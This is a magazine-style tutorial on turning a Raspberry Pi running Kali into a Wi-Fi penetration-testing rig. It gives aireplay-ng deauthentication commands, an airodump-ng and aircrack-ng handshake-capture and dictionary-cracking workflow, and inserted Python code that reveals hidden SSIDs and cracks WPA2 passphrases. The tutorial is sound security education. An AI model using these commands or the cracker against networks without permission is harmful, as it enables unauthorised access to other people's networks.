Raspberry Pi protection!

The best offence is a strong Raspberry Pi defence, cries Nate Drake, as he charges into the fray wielding a tiny single-board PC and his Linux knowledge.


Your Raspberry Pi can be used as much more than a hobbyist's computer. As a separate machine, you can employ it to improve the security of your home or office network. Over the following pages, you'll learn how to transform your Pi into a wireless attack platform using the penetration-testing OS Kali, capable of hacking networks.

The Pi can also function as a buffer between your computer and potential malware. For this reason, you'll also discover how to use it as an ad-blocking DNS server with Pi-hole, and as a sanitiser for removing harmful files from USB sticks before you insert them into your PC.

More experienced users may also enjoy our guide on setting up your Pi as a network honeypot. This allows your Pi to masquerade as a full-blown web server complete with dummy files. All activity by hackers is recorded and no changes they make will affect other devices on your network, giving you crucial insight into who wants to access your data.

We start with the subtle art of Wardriving: driving around in a vehicle while using a computer to search for vulnerable wireless networks to exploit. Wireless hacking software is freely available over the internet. Small computers like the Raspberry Pi are also very easy to power and conceal. As such, Wardrivers no longer require a team of men in a white van to break into wireless networks. Indeed, in recent years there have also been examples of Warcycling and Wardroning.

This guide focuses on how you, as an ethical hacker, can perform penetration tests on routers and IoT devices to make sure they're less vulnerable to this form of exploitation.

Before we begin, we'd like to offer the usual disclaimer that you should only perform penetration testing on networks with the permission of the owner, even (and especially) if you feel that their security is particularly lax.

As you're acting legally, there is no particular need to emulate Wardrivers fully by strapping your Pi onto a drone or vehicle. However, we encourage you to partner up with a fellow pen-tester and focus your Wardriving attempts on each other's networks instead of your own. This will make for a much more realistic test, as you can also see how easy it is for a stranger to gain physical access to the area where their network is based. It's also a good deal more fun!

At the Wardriver wheel

To get started as a Wardriver, you'll need a Raspberry Pi that supports wireless, such as the Raspberry Pi 3 or Raspberry Pi Zero W (the built-in Wi-Fi will get you online, but its stock firmware can't do monitor mode, so you'll still want the USB adaptor described below). You'll also need a microSD card at least 16GB in size to install Kali.

All of the steps outlined below can be run from the command line, so technically you could boot your Pi and connect via SSH from a laptop or similar. However, it makes more sense as a Wardriver to connect your Pi to an external display such as the official Raspberry Pi seven-inch touchscreen display. This will save space, particularly if you install an onscreen keyboard such as matchbox-keyboard.

If you plan to use your Wardriving Pi in a vehicle, consider either connecting it to a portable battery pack or, better yet, to your car's lighter socket. Whichever power source you use, make sure it matches the Pi's requirements (5V, 2.5A).

You'll also need a wireless adaptor that can be connected via USB and is compatible with the aircrack-ng suite, in that its driver can enter monitor mode and perform packet injection. When researching this article we used the Racksoy Professional Ralink 5370 (available from Amazon UK for around £6).

If you're pen-testing your own networks or a friend's then it's not very likely you'll need to map out exactly where they are, as you'll already know! However, Wardrivers sometimes make use of GPS devices when running kismet to be able to locate target networks in their area.

As an ethical hacker, you might also wish to do this in order to seek out rogue Wi-Fi APs in your organisation, which can make your network more vulnerable. There are a number of compatible GPS devices. For this article we used the GlobalSat BU-353-S4 USB receiver, which is available for around £30 on Amazon UK.

If you do want to plot Wi-Fi networks, open Terminal on Kali and run apt-get install gpsd gpsd-clients. This installs the basic GPS software. Connect the GPS device to a USB port on the Pi and run dmesg | tail -n 5 to find out which serial device node it has been given: for example, /dev/ttyUSB0.

Next, edit the kismet configuration file by running nano /etc/kismet/kismet.conf. Kismet can either read the receiver directly or take positions from gpsd, and the config file lets you pick only one. To let gpsd handle the receiver (as we do here), make sure the lines gps=true and gpstype=gpsd are uncommented. The alternative the file offers is to uncomment gpstype=serial and gpsdevice=/dev/rfcomm0 by removing the # at the start, replacing rfcomm0 with the actual location of the GPS device, for example ttyUSB0; in that case don't start gpsd as well, because two programs can't hold the serial port at once. Press Ctrl+X, Y, then Return to save and exit.

Start the GPS daemon against the device node you found, for example gpsd /dev/ttyUSB0, then run kismet. You should now see the GPS data displayed in the kismet window.

This is automatically saved to a .netxml file in your home folder. You can use the program giskismet to transform this into a .kml file, which is compatible with map software like Google Earth. First install the program with apt-get install giskismet, then run it on the .netxml file: for example, giskismet -x capture1-01.kismet.netxml.

Next, use the command giskismet -q "select * from wireless" -o <filename>.kml to create the .kml file itself.

In the words of Girls Against Boys, you can't fight what you can't see. This can lead some network managers and home users to think that using a hidden Wi-Fi network will protect them from Wardriving, as a hacker would need to know both the name of the wireless network and the password.

Hidden networks are in fact extremely easy to detect. Using Terminal in Kali, simply run airodump-ng <interface>, for example airodump-ng wlan1mon, to list nearby networks. Hidden networks appear in the list like any other; only the ESSID (network name) is withheld, and airodump-ng shows it as <length: N>, where N is the length of the real name. The BSSID, channel, encryption type and attached clients are all still visible, because the AP keeps sending beacons with the name blanked out rather than going quiet.

Run airodump-ng once again to focus on this specific network using its MAC address, such as airodump-ng -c 1 --bssid CC:61:E5:CE:90:92 wlan1mon. This will list any clients attached to the hidden network.

Finally, follow the steps in the guide to open a new tab in Terminal and try to deauthenticate one or more of the devices, adding the -c option to target a specific client. For example: aireplay-ng -0 5 -a CC:61:E5:CE:90:92 -c 10:9A:DD:B3:48:0B wlan1mon. A deauthenticated client reconnects on its own, and to do so it has to name the network in its probe request and association request, which the AP answers in the clear. If you're successful, when you return to the original airodump-ng Terminal window you'll see the name of the hidden Wi-Fi network has now appeared under 'ESSID'.
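To make the point concrete, here is an added example (not code from the original article or from the aircrack-ng project) that parses the 802.11 management frames airodump-ng is looking at. A cloaked AP's beacons carry an SSID element of the correct length filled with NUL bytes, which is what airodump-ng renders as <length: N>; the probe response the AP sends to a reconnecting client carries the real name. Every frame below is constructed in-process so the script runs offline; the BSSID and client MAC are the ones from the commands above, the network names are made up.

```python
"""Why a 'hidden' SSID only hides in beacons: parse the frames and watch the name leak."""
import struct

MGMT_HDR_LEN = 24        # frame control(2) duration(2) addr1-3(18) sequence control(2)
FIXED_PARAMS_LEN = 12    # timestamp(8) beacon interval(2) capability(2)
SUBTYPE_BEACON = 8
SUBTYPE_PROBE_RESP = 5
BROADCAST = b"\xff" * 6


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype, bssid, ssid_body, dst=BROADCAST):
    """Constructed beacon or probe response carrying one SSID element (sample input only)."""
    fc = bytes([subtype << 4, 0x00])                  # type 0 = management, no flags
    header = fc + b"\x00\x00" + dst + bssid + bssid + b"\x00\x00"
    fixed = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)  # timestamp, 100 TU, ESS+privacy
    ssid_ie = bytes([0, len(ssid_body)]) + ssid_body  # element ID 0 = SSID
    rates_ie = bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])  # element ID 1 = supported rates
    return header + fixed + ssid_ie + rates_ie


def parse_ssid_element(frame):
    """Return (subtype, bssid, ssid_body) for a beacon/probe response, else None."""
    if len(frame) < MGMT_HDR_LEN + FIXED_PARAMS_LEN:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:                # not a management frame
        return None
    subtype = (fc0 >> 4) & 0xF
    if subtype not in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP):
        return None
    bssid = frame[16:22]                     # addr3 is the BSSID in both subtypes
    pos = MGMT_HDR_LEN + FIXED_PARAMS_LEN
    while pos + 2 <= len(frame):             # walk the tagged parameters
        ie_id, ie_len = frame[pos], frame[pos + 1]
        body = frame[pos + 2:pos + 2 + ie_len]
        if len(body) != ie_len:
            return None                      # truncated element: don't trust the frame
        if ie_id == 0:
            return subtype, bssid, body
        pos += 2 + ie_len
    return subtype, bssid, None


def ssid_status(body):
    """Classify the element as airodump-ng does: ('hidden', N) or ('visible', name)."""
    if body is None or len(body) == 0 or body.count(0) == len(body):
        return ("hidden", 0 if body is None else len(body))
    return ("visible", body.decode("utf-8", "replace"))


def reveal_hidden_ssids(frames):
    """Map each BSSID whose beacons were cloaked to the name a later probe response leaked."""
    cloaked, revealed = {}, {}
    for frame in frames:
        parsed = parse_ssid_element(frame)
        if parsed is None:
            continue
        _subtype, bssid, body = parsed
        key = mac_str(bssid)
        status, value = ssid_status(body)
        if status == "hidden":
            cloaked.setdefault(key, value)   # remember the advertised length
        elif key in cloaked and key not in revealed:
            revealed[key] = value            # same BSSID, name now in the clear
    return revealed


# Constructed capture: cloaked beacons, a visible neighbour, a data frame, and finally
# the probe response the AP sends once the deauthenticated client comes back.
AP = bytes.fromhex("cc61e5ce9092")
CLIENT = bytes.fromhex("109addb3480b")
NEIGHBOUR = bytes.fromhex("001122334455")
SAMPLE_FRAMES = [
    build_mgmt_frame(SUBTYPE_BEACON, AP, b"\x00" * 9),
    build_mgmt_frame(SUBTYPE_BEACON, NEIGHBOUR, b"OpenCafe"),
    bytes([0x08, 0x00]) + b"\x00" * 40,      # a data frame, ignored by the parser
    build_mgmt_frame(SUBTYPE_PROBE_RESP, AP, b"HomeWifi9", dst=CLIENT),
]

if __name__ == "__main__":
    for bssid, name in reveal_hidden_ssids(SAMPLE_FRAMES).items():
        print(f"{bssid}: hidden network is '{name}'")
```

The same correlation works on a real .cap: feed the parser the raw 802.11 frames (strip any radiotap header first) and the cloaked BSSIDs resolve as soon as any client probes or associates.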

Help­ful hand­shakes

When a client connects to a WPA-secured AP (Access Point), the two run a four-way handshake. Both sides already hold the Pairwise Master Key (PMK), derived from the passphrase and the network name. The AP first sends the client a random nonce value (the ANonce) in the clear. The client generates its own nonce (the SNonce), combines the PMK, both nonces and both MAC addresses into a Pairwise Transient Key (PTK), and replies, unencrypted, with its SNonce plus a MIC (message integrity code) calculated over that reply using part of the PTK. The AP can then derive the same PTK and check the MIC, which proves the client knows the passphrase without the key itself ever crossing the air. The AP then sends the group key (encrypted, with its own MIC), the client acknowledges it, and the connection between the two is secured.

This is an oversimplification of how wireless networking operates, but it's important you understand it in general terms, as capturing the data packets used during handshakes is a crucial first step in breaking into a wireless network.

As you'll see from the guide (right), it's easy to record data packets from a wireless network and capture handshakes. You can, however, increase your network security by using strong Wi-Fi passwords and changing them regularly.

Pass­word crack­ing

If you follow the steps in the guide to capture data using airodump-ng, you'll find a data capture file with the extension .cap sitting in your home folder (/root on Kali): capture-01.cap, say.

If the captured data contains handshakes between clients and the target AP, you can perform a dictionary attack on the password using aircrack-ng. This utility works by using a list of common passwords as well as words from the dictionary. You can find a number of popular password lists online, including that used by the password-cracking utility John the Ripper, which comes preinstalled in Kali.

To download the John the Ripper password list, open Terminal and run: wget http://downloads.skullsecurity.org/passwords/john.txt.bz2

Extract the file by running bzip2 -d john.txt.bz2, then begin trying to crack the Wi-Fi password with aircrack-ng -w john.txt <capture-file-name>, for example aircrack-ng -w john.txt capture-01.cap.
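What aircrack-ng actually does with that capture and wordlist follows directly from the handshake description in 'Helpful handshakes'. The added example below (not code from the original article or from aircrack-ng) re-implements the WPA2 case with nothing but the Python standard library: derive the PMK from each candidate passphrase, expand it into the PTK with the two nonces and two MACs, and check whether the first 16 bytes of the PTK reproduce the MIC on handshake message 2. Because the script has to run offline, the 'captured' handshake is constructed in-process from a known passphrase; the MACs are the ones used earlier in the article, and the SSID, nonces and wordlist are made up. With a real .cap you would pull the same fields (SSID, AP and client MACs, ANonce, SNonce, the full EAPOL frame of message 2) out of the file instead.

```python
"""Minimal WPA2 dictionary attack: the arithmetic behind aircrack-ng -w wordlist capture.cap."""
import hashlib
import hmac

MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC
MIC_LEN = 16


def pmk_from_passphrase(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This step is where almost all the cracking time goes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """802.11i PRF-512: HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    out = b""
    for i in range(4):                      # 4 x 20 bytes covers the 64 we need
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_eapol_msg2(snonce, replay_counter=1):
    """Constructed EAPOL-Key message 2 (RSN descriptor, key info version 2) with a zeroed MIC."""
    body = (bytes([0x02])                          # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")          # key info: HMAC-SHA1 MIC, pairwise, MIC bit
            + (16).to_bytes(2, "big")              # key length for CCMP
            + replay_counter.to_bytes(8, "big")
            + snonce                               # 32-byte SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, reserved
            + b"\x00" * MIC_LEN                    # MIC field, zero while computing
            + (0).to_bytes(2, "big"))              # key data length
    return bytes([0x02, 0x03]) + len(body).to_bytes(2, "big") + body


def compute_mic(kck, eapol_frame):
    """WPA2 MIC: HMAC-SHA1 over the whole EAPOL frame with the MIC field zeroed, truncated to 16."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def crack(handshake, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC, else None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        ptk = derive_ptk(pmk, handshake["ap_mac"], handshake["client_mac"],
                         handshake["anonce"], handshake["snonce"])
        kck = ptk[:16]                       # Key Confirmation Key is the first 128 bits of the PTK
        if hmac.compare_digest(compute_mic(kck, handshake["eapol2"]), handshake["mic"]):
            return candidate
    return None


def constructed_handshake(passphrase="correct horse", ssid="LXFWardrive"):
    """Stand-in for a real capture: the client's side of the handshake with a known passphrase."""
    ap_mac = bytes.fromhex("cc61e5ce9092")
    client_mac = bytes.fromhex("109addb3480b")
    anonce = hashlib.sha256(b"anonce-seed").digest()   # deterministic stand-ins for random nonces
    snonce = hashlib.sha256(b"snonce-seed").digest()
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    eapol2 = build_eapol_msg2(snonce)
    mic = compute_mic(ptk[:16], eapol2)
    eapol2 = eapol2[:MIC_OFFSET] + mic + eapol2[MIC_OFFSET + MIC_LEN:]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "eapol2": eapol2, "mic": mic}


if __name__ == "__main__":
    captured = constructed_handshake()
    wordlist = ["password", "123456", "correct horse", "letmein"]   # made-up john.txt excerpt
    print("KEY FOUND:", crack(captured, wordlist))
```

Two things worth noticing: the SSID is the salt, so a precomputed table only helps against one network name, and the 4096 PBKDF2 iterations per candidate are the reason a GPU (or a desktop) beats the Pi so comfortably. The original WPA (TKIP) handshake uses key info version 1, whose MIC is HMAC-MD5 rather than the HMAC-SHA1 shown here.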

The Raspberry Pi 3 can check around 500 passwords a second, which sounds impressive until you realise password lists can contain millions of words. As aircrack-ng can be run offline, we suggest you transfer the capture file to a desktop machine or use cloud computing to crack the password.

The speed at which you crack the password will also be determined by the quality of the password list. See https://github.com/danielmiessler/SecLists/tree/master/Passwords for a more comprehensive set of password lists. Be warned that some of these are well over 100MB.

If the target AP supports WPS, you may be able to break in using the Raspberry Pi alone without capturing or cracking any handshake data. See the Crack WPS with Reaver boxout (below) for help with this.

Wardriving works best when you're near the target network (the clue is in the name) and there are few other sources of wireless interference. If you want to make sure your network is safe at a range, or find your current wireless card is impractical for pen-testing, consider using a larger antenna (see the previous 'Yes you can-tenna!' boxout).

Even devices that are advertised as Linux compatible and/or you've used previously with Kali Linux on a desktop machine may not necessarily work with the version of the Linux kernel you're using on the Pi. Make sure to research thoroughly before getting started.

If you deauthenticate every client on a network (aireplay-ng -0 without the -c option) but are still unable to capture handshakes, you may have more joy by targeting individual clients. See the previously mentioned section on hidden networks for details on how to do this.

Both dictionary and brute-force attacks on Wi-Fi passwords will take much longer on the Pi than on a regular computer. We suggest you capture your files on the Pi, then transfer them elsewhere, for example to a desktop machine. If you've a few shekels to spare, consider cracking WPA2 passwords using cloud computing, such as a GPU-equipped EC2 instance running the Amazon Linux AMI, where GPU-based dictionary and brute-force attacks considerably speed up the process.

If you've been suitably terrified by what you've read here, make sure to apply what you've learned and encourage your friends/clients to use WPA2 with AES (CCMP) encryption where possible and to disable WPS on all devices. If you discovered any lurking rogue APs, you may also want to ask them to draft a policy for setting up wireless networks in their workplace.

Keep an eye in your area for War Chalking. Inspired by the Hobo signs of yesteryear, these alert fellow Wardrivers to various kinds of networks.

Use software like Google Earth to display the .kml created by giskismet. This is an excellent way to find rogue access points.
